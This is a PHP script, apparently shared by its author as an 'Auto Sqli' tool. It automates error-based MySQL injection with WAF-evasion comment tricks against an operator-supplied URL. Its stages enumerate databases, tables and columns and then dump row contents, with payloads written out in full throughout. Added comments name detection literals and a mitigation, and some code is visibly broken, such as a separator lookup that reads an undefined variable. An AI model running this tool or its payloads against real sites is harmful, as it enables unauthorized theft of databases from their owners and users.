
Auto Sqli [Error-based] + WAF Bypass

<?php
// Request dispatcher for the injector form. Every branch takes the target URL
// from $_POST["url"], appends a fixed probe suffix, fetches the page through
// LoadSite() and string-matches the response body. The whole flow depends on
// the target echoing raw MySQL error text ("You have an error in your SQL
// syntax", "Duplicate entry") back to the client, so the target-side
// mitigation is parameterised queries plus generic error pages.
// Detection note: the probes carry stable literals that can be matched in
// web-server or WAF logs: "group+by+concat_ws(0x7e", "floor(rand(0)*2)",
// the "/*!50000" and "/*!information_schema" version-comment fragments and
// the "--+f+--+" trailer.
// Lifts the execution time limit and hides the warning if that is refused.
@set_time_limit(0);
if(empty($_POST)==0){
// opt1: initial probe against the operator-supplied URL. $_url is never
// validated and is echoed back into HTML attributes below unescaped.
if(empty($_POST["opt1"])==0){
$Fd=false;
// The three suffixes tried in turn: 1", 1' and a bare 1.
$pb=array('1"','1' . chr(39),'1');
$_url = $_POST["url"];
foreach($pb as $zz){
$_buffer = LoadSite($_url . $zz, "");
// First match on the MySQL syntax-error message wins.
if(preg_match("#You have an error in your SQL syntax#", $_buffer)){$Fd=true;break;}
}
if($Fd){
$seperator='';
// Second pass: the suffix whose response contains "Duplicate entry" is kept.
foreach($pb as $zz){
$fg=$_url . $zz . '+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1+--+f+--+';
$_buffer=LoadSite($fg,"");
if(preg_match("#Duplicate entry#",$_buffer)){$seperator=$zz;break;}
}
if($seperator==''){echo "NOTHING UP HERE";exit();}
echo '<table><tr><td valign="top">';
$fg=$_url . $seperator . '+or+1+group+by+concat_ws(0x7e,version(),user(),database(),floor(rand(0)*2))+hav?ing+min(0)+or+1+--+f+--+';
// Response parsing used by every branch: drop single quotes, split on the
// "Duplicate entry" marker, then split the tail on '~'. When the marker is
// absent $lde[1] is undefined (notice) and every field below is empty.
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode('~',$lde[1]);
$version=$_buffer1[0];$user=$_buffer1[1];$database=$_buffer1[2];
// Target-returned strings are printed without htmlspecialchars(): a target
// that answers with crafted content can inject markup into this page.
echo "Version : " . $version . "</br>User : " . $user . "</br>database : " . $database;
$fg=$_url . $seperator . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+distinct+Concat/*!50000*/(0x7e,0x27,count(schema_name),0x27,0x7e)+FROM+/*!information_schema.schemata*/+LIMIT+0,1))+FROM+/*!information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode('~',$lde[1]);
// $dbcount is the raw string from the response; the for-loop below compares
// it numerically, so a non-numeric reply means zero iterations.
$dbcount=$_buffer1[1];
echo '</br>DbCount : ' . $dbcount . '</br></td><td><table border="3"><tr><td>Databases : </td></tr>';
for ($i=0;$i<$dbcount; $i++){
// One auto-submitting form per row; the hidden fields carry the state for
// the opt2 branch.
echo '<tr><td><form name="dt' . $i . '" method="post" target="_blank" style="display:inline">';
$fg=$_url . $seperator . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+distinct+Concat/*!50000*/(0x7e,0x27,CONVERT/*!50000(schema_name+USING+utf8)*/,0x27,0x7e)+FROM+/*!information_schema.schemata*/+LIMIT+'.$i.',1))+FROM+/*!information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode('~',$lde[1]);
// Same unescaped output issue: $_buffer1[1] and $_url land inside attribute
// values and element text verbatim.
echo '<div onclick="document.dt' . $i . '.submit()">' . $_buffer1[1] . '</div>';
echo '<input type="hidden" name="nameinbase" value="' . String2Hex($_buffer1[1]) . '">';
echo '<input type="hidden" name="url" value="' . $_url . '">';
echo '<input type="hidden" name="opt2" value="1">';
echo '<input type="hidden" name="seperator" value="';
// The matched suffix is encoded as 1/2/3 for the next request;
// GetSeperatorByInteger() is the intended inverse of this switch.
switch($seperator){
case '1"':echo "1";break;
case '1' . chr(39):echo "2";break;
case '1':echo "3";break;
}
echo '"></form></td></tr>';
}
echo "</table><td></tr></table>";
}
}elseif(empty($_POST["opt2"])==0){
// opt2: table list for the database chosen on the opt1 page. The same
// fetch / "Duplicate entry" / '~' parsing pattern as above.
$_url = $_POST["url"];
$seperator = $_POST["seperator"];
$sepe=GetSeperatorByInteger($seperator);
// $_POST["nameinbase"] is spliced in after "0x" with no check that it is a
// hex string; it is operator-controlled form state from the previous page.
$fg=$_url . $sepe .'+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+concat+/*!50000*/(0x7e,0x27,count(table_name),0x27,0x7e)+FROM+/*!information_schema.tables*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'))+FROM+/*!information_schema.tables+LIMIT*/+0,1),floor(rand(0)*2))x+FROM/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode('~',$lde[1]);
$cta=$_buffer1[1];
echo '<table border="3"><tr><td>Tables From ' . Hex2String($_POST["nameinbase"]) . ' : (Total: '.$cta.') </td></tr>';
for ($i=0;$i<$cta; $i++){
echo '<tr><td><form name="dt' . $i . '" method="post" target="_blank" style="display:inline">';
$fg = $_url . $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+distinct+concat/*!50000*/(0x7e,0x27,CONVERT/*!50000(table_name+USING+utf8)*/,0x27,0x7e)+FROM+/*!information_schema.tables*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'+LIMIT+'.$i.',1))+FROM+/*!information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode('~',$lde[1]);
// Unescaped output of target-returned text and request fields, as in opt1.
echo '<div onclick="document.dt' . $i . '.submit()">' . $_buffer1[1] . '</div>';
echo '<input type="hidden" name="nameinbase" value="' . $_POST["nameinbase"] . '">';
echo '<input type="hidden" name="nameinbase2" value="' . String2Hex($_buffer1[1]) . '">';
echo '<input type="hidden" name="url" value="' . $_url . '">';
echo '<input type="hidden" name="opt3" value="1">';
echo '<input type="hidden" name="seperator" value="' . $seperator . '">';
echo "</form></td></tr>";
}
}elseif(empty($_POST["opt3"])==0){
// opt3: column list for the table chosen on the opt2 page; same pattern,
// same unvalidated nameinbase / nameinbase2 form state.
$_url = $_POST["url"];
$seperator = $_POST["seperator"];
$sepe=GetSeperatorByInteger($seperator);
$fg = $_url . $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+concat+/*!50000*/(0x7e,0x27,count(column_name),0x27,0x7e)+FROM+/*!information_schema.columns*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'+AND+table_name=0x'.$_POST["nameinbase2"].'))+FROM+/*!information_schema.tables+LIMIT*/+0,1),floor(rand(0)*2))x+FROM/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode('~',$lde[1]);
$cta=$_buffer1[1];
echo '<table border="3"><tr><td>columns from ' . Hex2String($_POST["nameinbase2"]) . ' in Database ' . Hex2String($_POST["nameinbase"]) . ' (Total: '.$cta.')</td></tr>';
for ($i=0;$i<$cta; $i++){
echo '<tr><td><form name="dt' . $i . '" method="post" target="_blank" style="display:inline">';
$fg=$_url . $sepe . '+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(select+distinct+concat/*!50000*/(0x7e,0x27,CONVERT/*!50000+(column_name+USING+utf8)*/,0x27,0x7e)+FROM+/*!50000information_schema.columns*/+WHERE+table_schema=0x'.$_POST["nameinbase"].'+AND+table_name=0x'.$_POST["nameinbase2"].'+LIMIT+'.$i.',1))+FROM+/*!50000information_schema.tables*/+LIMIT+0,1),floor(rand(0)*2))x+FROM+/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode("~",$lde[1]);
echo '<div onclick="document.dt' . $i . '.submit()">' . $_buffer1[1] . '</div>';
echo '<input type="hidden" name="nameinbase" value="' . $_POST["nameinbase"] . '">';
echo '<input type="hidden" name="nameinbase2" value="' . $_POST["nameinbase2"] . '">';
echo '<input type="hidden" name="nameinbase3" value="' . String2Hex($_buffer1[1]) . '">';
echo '<input type="hidden" name="url" value="' . $_url . '">';
echo '<input type="hidden" name="opt4" value="1">';
echo '<input type="hidden" name="seperator" value="' . $seperator . '">';
echo "</form></td></tr>";
}
echo '</table>';
}elseif(empty($_POST["opt4"])==0){
// opt4: row values of the chosen column. Here the three hex-encoded names are
// decoded with Hex2String() and placed into the query as bare identifiers.
$_url = $_POST["url"];
$seperator = $_POST["seperator"];
$sepe=GetSeperatorByInteger($seperator);
$fg = $_url . $sepe .'+and(select+1+FROM(select+count(*),concat/*!50000*/((select+(select+(SELECT+concat+/*!50000*/(0x7e,0x27,count('.Hex2String($_POST["nameinbase3"]).'),0x27,0x7e)+FROM+'.Hex2String($_POST["nameinbase"]).'.'.Hex2String($_POST["nameinbase2"]).'))+FROM+/*!information_schema.tables+LIMIT*/+0,1),floor(rand(0)*2))x+FROM/*!50000information_schema.tables*/+GROUP+BY+x)a)+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode('~',$lde[1]);
$cta=$_buffer1[1];
echo '<table border="3"><tr><td>Items : (Total: '.$_buffer1[1].')</td></tr>';
for ($i=0;$i<$cta; $i++){
$fg=$_url .$sepe . '+and+(select+1+FROM(select+count(*),concat/*!50000*/((select+concat/*!50000*/(0x7e,0x27,'.Hex2String($_POST["nameinbase3"]).',0x27,0x7e)+FROM+'.Hex2String($_POST["nameinbase"]).'.'.Hex2String($_POST["nameinbase2"]).'+LIMIT+'.$i.',1),floor(rand(0)*2))x+FROM+/*!information_schema.tables*/+GROUP+BY+x)+--+f+--+';
$lde=explode('Duplicate entry',str_replace(chr(39), "", LoadSite($fg, "")));
$_buffer1 = explode('~',$lde[1]);
// Row values are printed verbatim (no escaping).
echo '<tr><td>' . $i . '</td><td>' . $_buffer1[1] . '</td></tr>';
}
// As written: the closing tag is missing its '>'.
echo '</table';
}
}else{
// No POST data: render the landing form, whose hidden opt1 field routes the
// first submission into the opt1 branch above.
?>
<style type="text/css">#sbz {text-align: center;color: #000;font-size: 20px;font-weight: bold;line-height: 0.8em;letter-spacing: 0.2em;margin:0;text-shadow: 0 1px 20px #00FF00, 0 0 5px #00FF00, 0 0px 30px #00FF00, 1px 0 3px #00FF00;}</style>
<html>
<head><title>T3N38R15 Injector for WAF Bypass</title></head>
<body>
<b id="sbz"><font size="100"></br>T3N38R15</br></br></br>Error Based SQL Injector</br></br></br></font></b>
<form method="post">
<input size="80" name="url" value="http://example.com/index.php?id="><input value="inject" type="submit">
<input type="hidden" name="opt1" value="1"></form>
</br>
Greets to Team M4DL33Ts
</body>
</html>
<?php
}
// Intended inverse of the switch in the opt1 branch: the forms carry the
// matched probe suffix as a numeric code ("1", "2", "3") in their hidden
// "seperator" field, and this is meant to turn that code back into the
// suffix text (1", 1' or 1). Any unmatched value yields ''.
function GetSeperatorByInteger($int){
switch($seperator){
case '1':return '1"';
case '2':return '1' . chr(39);
case '3':return '1';
}
return '';
}
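// Returns the lowercase hexadecimal encoding of every byte of $string,
// without any prefix (e.g. "abc" -> "616263"). Used to build the 0x... form
// values handed from one page to the next.
// bin2hex() always emits two digits per byte; the previous dechex(ord())
// loop dropped the leading zero for bytes below 0x10, which made the
// resulting string undecodable by Hex2String().
function String2Hex($string){
    return bin2hex($string);
}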
// Decodes a bare hex string back into bytes, two characters per byte
// (e.g. "616263" -> "abc"). A trailing odd character is ignored, and any
// non-hex characters are passed to hexdec() unchanged, so they do not
// raise an error here.
function Hex2String($hex){
    $decoded = '';
    $pairCount = (int) (strlen($hex) / 2);
    for ($pair = 0; $pair < $pairCount; $pair++) {
        $decoded .= chr(hexdec(substr($hex, $pair * 2, 2)));
    }
    return $decoded;
}
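// Fetches $url with cURL and returns the response body as a string; returns
// null when no handle could be created and false when the transfer failed.
// The URL is whatever the operator typed into the form, and redirects are
// followed, so a hosted copy of this script acts as a server-side request
// relay for anyone who can reach it.
// Detection note: the User-Agent is a fixed Firefox 31 / Windows XP string,
// which is a stable indicator in the target's access logs.
function LoadSite($url, $postdata){
$agent = "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0";
// Initialised up front: previously $tmp was only assigned inside the if, so
// a failed curl_init() made the return read an undefined variable.
$tmp = null;
$ch = curl_init($url);
if ($ch){
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch,CURLOPT_USERAGENT, $agent);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
// isset() is true for the "" every caller passes, so each request goes out
// as a POST with an empty body. Left unchanged so the outgoing requests are
// the same as before.
if (isset($postdata)){
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $postdata);}
$tmp = curl_exec ($ch);
curl_close ($ch);
}
return $tmp;
}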
?>

Credits to : T3N38R15
